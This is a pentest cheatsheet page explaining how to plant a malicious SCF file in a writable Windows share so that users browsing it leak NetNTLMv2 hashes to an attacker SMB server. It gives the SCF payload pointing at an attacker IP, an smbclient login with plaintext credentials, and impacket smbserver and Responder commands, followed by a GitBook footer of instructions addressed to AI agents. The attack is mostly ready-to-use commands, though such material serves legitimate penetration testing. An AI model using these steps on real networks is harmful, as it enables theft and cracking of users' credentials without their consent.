> For the complete documentation index, see [llms.txt](https://lanzt.gitbook.io/cheatsheet-pentest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lanzt.gitbook.io/cheatsheet-pentest/windows-things/active-directory-methodology/attacks/scf-files.md).

# SCF Files

Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.

## Access to Shared Folder

```bash
smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'
```

## Create SCF file

```powershell
[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop
```

## Upload SCF file to Shared Folder

<figure><img src="/files/WriJy2veZGFlCe6VLWYy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tlGuQZQOdjzZRZm9bgT5" alt=""><figcaption></figcaption></figure>

## Serve the attacker Shared Folder

```bash
python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support
```

And now we need to wait for an interaction with the payroll-2024 shared folder.

Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.

<figure><img src="/files/kFoIwWj3bDrMhAg07MEE" alt=""><figcaption></figcaption></figure>

## Or using Responder.py

```bash
sudo python3 Responder.py -I eth0
```

Wait and once we detect an interaction with the folder:

<figure><img src="/files/WJYqDlA4JPe3wUvx1L5F" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://lanzt.gitbook.io/cheatsheet-pentest/windows-things/active-directory-methodology/attacks/scf-files.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.